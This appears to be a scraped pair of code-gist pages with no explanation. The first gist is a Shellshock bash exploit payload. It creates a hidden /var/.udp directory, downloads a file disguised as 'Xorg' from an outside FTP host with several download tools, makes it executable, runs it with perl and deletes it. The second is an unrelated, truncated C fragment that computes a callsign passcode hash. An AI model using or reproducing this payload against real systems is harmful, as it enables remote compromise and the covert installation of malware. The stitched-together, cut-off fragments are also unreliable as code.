This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
() { :;}; | |
/bin/bash -c \x22mkdir /var/.udp; | |
wget ftp://ftp.ugotownedz.org/Xorg -O /var/.udp/Xorg; | |
wget ftp://ftp.ugotownedz.org/Xorg -O /var/.udp/Xorg; | |
curl -o /var/.udp/Xorg ftp://ftp.ugotownedz.org/Xorg;GET ftp://ftp.ugotownedz.org/Xorg;fetch ftp://ftp.ugotownedz.org/Xorg; | |
lwp-download ftp://ftp.ugotownedz.org/Xorg; | |
chmod +x /var/.udp/Xorg; | |
chmod +x Xorg; | |
perl /var/.udp/Xorg; | |
rm -rf /var/.udp/Xorg*; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
short passcode(const char *callsign) { | |
uint8_t i, len; | |
short hash = KEY; | |
char no_ssid[10], *p1 = no_ssid, *ptr = no_ssid; | |
// remove SSID | |
while((*callsign != '-') && (*callsign != '\0')) *p1++ = toupper((int) (*callsign++)); | |
*p1 = '\0'; | |
i = 0; |